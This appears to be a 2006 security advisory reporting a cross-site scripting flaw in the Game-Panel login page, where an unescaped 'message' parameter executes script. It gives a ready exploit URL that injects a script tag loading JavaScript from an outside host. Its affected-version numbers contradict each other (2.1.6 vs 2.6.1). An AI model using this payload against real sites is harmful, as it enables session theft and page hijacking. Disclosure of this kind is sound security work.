Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11707
HistoryMar 06, 2006 - 12:00 a.m.

Game-Panel <= 2.1.6 XSS

2006-03-0600:00:00
vulners.com
3

ORIGIONAL SOURCE: http://notlegal.ws/gamepanel.txt

summary
software: Game-Panel
vendors website: http://game-panel.com
versions: <= 2.6.1
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: sycko
risk level: medium
description
game-panel uses a global variable to print out
error messages on their login page allowing
execution of javascript
exploit(s)
http://example.com/login.php?message=&#37;3CSCRIPT&#37;20SRC=http://notlegal.ws/xss.js&#37;3E&#37;3C/SCRIPT&#37;3E

credit
author(s): retard, jim, and sycko
email: [email protected]